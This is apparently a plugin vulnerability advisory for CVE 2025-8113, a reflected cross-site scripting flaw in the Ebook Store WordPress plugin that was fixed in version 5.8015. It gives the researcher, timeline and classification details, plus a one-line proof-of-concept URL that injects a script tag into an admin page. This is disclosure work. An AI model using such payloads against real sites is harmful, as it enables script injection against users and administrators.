Ebook Store < 5.8015 – Reflected XSS via $_SERVER['REQUEST_URI'] | CVE 2025-8113 | Plugin Vulnerabilities

Description

The plugin does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers.

Proof of Concept

1. Install WP Super Cache alongside `ebook-store`
2. Go to `https://example.com/wp-admin/options-general.php?page=ebook_options.php&cow=2"><script>alert(5)</script>`
3. See the XSS

Affects Plugins

Fixed in 5.8015

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

752908b4-7d05-476f-8920-1d0e58fc2983

Timeline

Publicly Published

2025-07-26 (about 5 months ago)

Added

2025-07-26 (about 5 months ago)

Last Updated

2025-07-26 (about 5 months ago)

Other

Published

Title

Published

2024-04-29

Title

Elementor Addon Elements < 1.13.4 - Contributor+ Stored XSS

Published

2025-02-18

Title

Pollin <= 1.01.1 - Reflected Cross-Site Scripting

Published

2024-08-23

Title

String Locator < 2.6.6 - Reflected Cross-Site Scripting

Published

2024-12-02

Title

AIO Contact <= 2.8.1 - Unauthenticated Stored Cross-Site Scripting

Published

2022-02-21

Title

Petfinder Listings < 1.1 - Admin+ Stored Cross-Site Scripting